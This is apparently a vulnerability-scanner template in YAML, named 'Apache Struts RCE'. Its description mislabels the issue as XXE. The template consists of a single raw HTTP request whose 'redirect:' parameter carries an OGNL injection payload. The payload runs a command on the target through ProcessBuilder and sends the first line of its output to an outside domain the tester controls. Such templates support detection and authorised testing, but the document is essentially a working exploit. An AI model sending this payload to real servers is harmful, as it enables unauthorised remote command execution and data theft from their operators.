id: ApacheStruts-RCE

info:
  name: Apache Struts RCE
  author: 0xAwali
  severity: critical
  description: Apache Struts XXE , Commonly Bound Ports 80 - 443 - 8080 - 8443
  reference:
      - https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/#struts
      - https://blog.safebuff.com/2016/07/03/SSRF-Tips/
            

requests:
  - raw:
      - |
        GET /?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://{{Host}}.{{Port}}.{{Hostname}}.apachestruts.{{MY-DOMAIN}}/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate